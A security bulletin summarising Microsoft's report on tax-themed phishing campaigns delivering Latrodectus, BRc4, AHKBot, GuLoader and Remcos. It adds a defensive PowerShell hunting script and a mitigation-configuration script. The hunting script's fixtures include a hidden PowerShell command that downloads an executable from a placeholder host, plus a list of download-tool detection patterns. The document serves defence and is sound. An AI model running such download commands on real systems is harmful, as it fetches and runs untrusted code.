Microsoft Warns of Tax-Themed Email Attacks Using PDFs and QR Codes to Deliver Malware

Summary:
As Tax Day in the U.S. approaches, Microsoft has observed a surge in phishing campaigns that use tax-related themes to steal credentials and deploy malware. The campaigns rely on several redirection techniques, including URL shorteners, QR codes embedded in attachments, and legitimate services such as file-hosting platforms and business profile pages, to evade detection. Microsoft found that many of these operations lead to the RaccoonO365 phishing-as-a-service platform or to malware such as Remcos, Latrodectus, Brute Ratel C4 (BRc4), AHKBot, and GuLoader.

On February 6, 2025, a campaign attributed to Storm-0249 targeted U.S. users with tax-themed emails distributing BRc4 and Latrodectus. The emails carried PDF attachments with embedded redirect links that eventually led to fake DocuSign pages. Depending on the victim's system and the operators' IP filtering rules, users received either malware-laced MSI installers or benign decoy PDFs. Latrodectus, a loader with anti-analysis features and dynamic C2 configurations, was delivered alongside BRc4, a red-teaming tool abused for post-exploitation.

From February 12 to 28, threat actors targeted over 2,300 organizations, mainly in engineering, IT, and consulting, with emails whose PDF attachments displayed QR codes. Each QR code resolved to a unique RaccoonO365 phishing link designed to steal Microsoft 365 credentials.

On February 13, an IRS-themed phishing email led users to download a malicious Excel file via a Google Business page redirector. Once macros were enabled, the Excel file executed an MSI that launched AHKBot, which used AutoHotKey scripts to exfiltrate screenshots from compromised systems.

On March 3, a more targeted campaign impersonated potential tax clients to build trust with accountants and CPAs. Once rapport was established, follow-up emails included a PDF that linked to a Dropbox-hosted ZIP file containing malicious .lnk files. These files triggered PowerShell scripts to download GuLoader, which then installed Remcos.
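The two delivery chains described above (an Excel macro launching an MSI that starts AHKBot, and a .lnk inside a ZIP launching PowerShell to fetch GuLoader) both leave distinctive parent/child process relationships on the endpoint. The following PowerShell is an added hunting example written for this summary; it is not code from the advisory or from Microsoft. It runs three rules over constructed, simplified process-creation records (the ParentImage, Image and CommandLine fields mirror Sysmon Event ID 1, but every event below is made up) and returns the matches.

```powershell
# Added example: hunt process-creation records for the parent/child chains this
# advisory describes. Event objects are constructed stand-ins for Sysmon Event
# ID 1 (ParentImage / Image / CommandLine); they are not real telemetry.

$OfficeApps    = @('excel.exe', 'winword.exe', 'powerpnt.exe', 'outlook.exe')
$LoaderChild   = @('msiexec.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'rundll32.exe', 'regsvr32.exe')
$ScriptHosts   = @('powershell.exe', 'pwsh.exe', 'cmd.exe')
# Command-line fragments that suggest a script host is pulling a remote payload.
$DownloadHints = @('Invoke-WebRequest', 'iwr ', 'DownloadString', 'DownloadFile',
                   'Net.WebClient', 'Start-BitsTransfer', 'curl ', 'certutil', '-enc', '-EncodedCommand')

# Last path component, lower-cased; splits on both \ and / so it also works under pwsh on Linux.
function Get-Leaf([string]$Path) { (($Path -split '[\\/]')[-1]).ToLowerInvariant() }

function Find-SuspiciousProcessChain {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        $parent = Get-Leaf $e.ParentImage
        $child  = Get-Leaf $e.Image
        $cmd    = [string]$e.CommandLine
        $hit    = $null

        # Rule 1: an Office application spawning an installer or LOLBin
        # (the "macros enabled -> MSI executed" step of the AHKBot chain).
        if ($OfficeApps -contains $parent -and $LoaderChild -contains $child) {
            $hit = 'OfficeSpawnsLoader'
        }
        # Rule 2: the AutoHotkey interpreter started by an installer or script host
        # (AHKBot runs as .ahk scripts under a dropped AutoHotkey.exe).
        elseif ($child -like 'autohotkey*.exe' -and (($LoaderChild + $ScriptHosts) -contains $parent)) {
            $hit = 'AutoHotkeyFromLoader'
        }
        # Rule 3: explorer.exe (a double-clicked .lnk) starting a script host whose
        # command line downloads something (the .lnk -> PowerShell -> GuLoader step).
        elseif ($parent -eq 'explorer.exe' -and $ScriptHosts -contains $child) {
            $marker = $DownloadHints | Where-Object { $cmd -match [regex]::Escape($_) } | Select-Object -First 1
            if ($marker) { $hit = "ExplorerScriptDownload($marker)" }
        }

        if ($hit) {
            [pscustomobject]@{
                Rule        = $hit
                Computer    = $e.Computer
                Parent      = $parent
                Child       = $child
                CommandLine = $cmd
            }
        }
    }
}

# Constructed sample records (not real telemetry): three malicious chains and one benign launch.
$SampleEvents = @(
    [pscustomobject]@{
        Computer    = 'WS01'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Image       = 'C:\Windows\System32\msiexec.exe'
        CommandLine = 'msiexec.exe /i C:\Users\jdoe\AppData\Local\Temp\irs_form.msi /qn'
    }
    [pscustomobject]@{
        Computer    = 'WS01'
        ParentImage = 'C:\Windows\System32\msiexec.exe'
        Image       = 'C:\Users\jdoe\AppData\Roaming\AutoHotkey.exe'
        CommandLine = 'AutoHotkey.exe C:\Users\jdoe\AppData\Roaming\script.ahk'
    }
    [pscustomobject]@{
        Computer    = 'WS02'
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -w hidden -c "Invoke-WebRequest -Uri https://example.invalid/x -OutFile $env:TEMP\a.exe"'
    }
    [pscustomobject]@{
        Computer    = 'WS03'
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\notepad.exe'
        CommandLine = 'notepad.exe'
    }
)

# Expected: three rows (OfficeSpawnsLoader, AutoHotkeyFromLoader, ExplorerScriptDownload); notepad is ignored.
Find-SuspiciousProcessChain -Events $SampleEvents | Format-Table -AutoSize
```

To run the same rules over real data on a host where Sysmon is installed (an assumption, not something the advisory states), read the operational log with `Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }` and project the ParentImage, Image and CommandLine event data into the same shape before passing it to `Find-SuspiciousProcessChain`. The download-hint list is deliberately broad and will flag some legitimate administrative scripts, so treat a match as a hunting lead rather than a verdict.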


Security Officer Comments:
These campaigns highlight the continued effectiveness of social engineering during seasonal events like tax season, especially when combined with malware delivery infrastructure and phishing-as-a-service platforms. Threat actors are increasingly combining social trust-building, obfuscated file attachments, redirect chains, and abuse of legitimate platforms to bypass detection and increase user interaction. Security teams should remain vigilant for indicators of compromise related to Latrodectus, BRc4, AHKBot, Remcos, and GuLoader, and implement layered defenses including email filtering, endpoint detection, threat hunting, and user education to reduce the risk of credential theft and system compromise.


Suggested Corrections:
Microsoft recommends the following mitigations to reduce the impact of this threat.
  • Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.
  • Turn on Zero-hour auto purge (ZAP) in Defender for Office 365 to quarantine sent mail in response to newly-acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
  • Pilot and deploy phishing-resistant authentication methods for users.
  • Enforce multifactor authentication (MFA) on all accounts, remove users excluded from MFA, and strictly require MFA from all devices in all locations at all times.
  • Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites including phishing sites, scam sites, and sites that contain exploits and host malware.
  • Educate users to check the browser address bar after clicking a link in search results and confirm they have arrived at the expected, legitimate domain.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow and time-of-click verification of URLs and links in email messages, other Microsoft Office applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links that are used in phishing and other attacks.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
  • Enable investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Run endpoint detection and response (EDR) in block mode, so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
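Several of the mitigations above are exposed through cmdlets, and an administrator will usually want them scripted and verifiable rather than clicked through. The following PowerShell is an added example written for this summary, not a script from Microsoft or the advisory. It assumes the ExchangeOnlineManagement module and Security Administrator rights for the Exchange Online section, local administrator rights on a Defender Antivirus endpoint for the Set-MpPreference section, and uses 'example.com' and the policy name as placeholders.

```powershell
# Added example (not Microsoft's own script): apply several of the mitigations
# listed above with the cmdlets that expose them, then read the settings back.
# Placeholders: the recipient domain 'example.com' and the policy name.

# --- Exchange Online / Defender for Office 365 ---------------------------------
Connect-ExchangeOnline

# Zero-hour auto purge (ZAP) on the default anti-spam and anti-malware policies,
# so messages already delivered to mailboxes are retroactively removed.
Set-HostedContentFilterPolicy -Identity 'Default' -ZapEnabled $true -SpamZapEnabled $true -PhishZapEnabled $true
Set-MalwareFilterPolicy       -Identity 'Default' -ZapEnabled $true

# Safe Links: rewrite inbound URLs and recheck them at time of click in mail,
# Teams and Office apps; do not let users click through a blocked warning.
$policyName = 'Tax-Season Safe Links'   # placeholder name
New-SafeLinksPolicy -Name $policyName `
    -EnableSafeLinksForEmail $true -EnableSafeLinksForTeams $true -EnableSafeLinksForOffice $true `
    -ScanUrls $true -DeliverMessageAfterScan $true -EnableForInternalSenders $true `
    -TrackClicks $true -AllowClickThrough $false
New-SafeLinksRule -Name $policyName -SafeLinksPolicy $policyName -RecipientDomainIs 'example.com'

# Read the settings back to confirm they took effect.
Get-HostedContentFilterPolicy -Identity 'Default' | Select-Object ZapEnabled, SpamZapEnabled, PhishZapEnabled
Get-MalwareFilterPolicy       -Identity 'Default' | Select-Object ZapEnabled
Get-SafeLinksPolicy -Identity $policyName |
    Select-Object Name, EnableSafeLinksForEmail, EnableSafeLinksForTeams, ScanUrls, AllowClickThrough

# --- Microsoft Defender Antivirus on the endpoint (run from an elevated prompt) -
# Cloud-delivered protection: report to MAPS, submit samples, raise the cloud block level.
Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -SubmitSamplesConsent SendAllSamples
Set-MpPreference -CloudBlockLevel High

# Network protection: block connections to known-malicious domains.
# Use -EnableNetworkProtection AuditMode first if you need to measure impact before enforcing.
Set-MpPreference -EnableNetworkProtection Enabled

Get-MpPreference | Select-Object MAPSReporting, SubmitSamplesConsent, CloudBlockLevel, EnableNetworkProtection

# EDR in block mode and fully automated investigation/remediation are tenant-level
# settings in the Microsoft Defender portal (Settings > Endpoints), not Set-MpPreference
# values, so they are configured there and verified from the portal rather than here.
```

The verification lines at the end of each section are the part worth keeping in a change ticket: a Safe Links policy with no matching rule, or network protection left in AuditMode, looks enabled in the portal summary but does nothing for the user who clicks the link.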

Link(s):
https://thehackernews.com/2025/04/microsoft-warns-of-tax-themed-email.html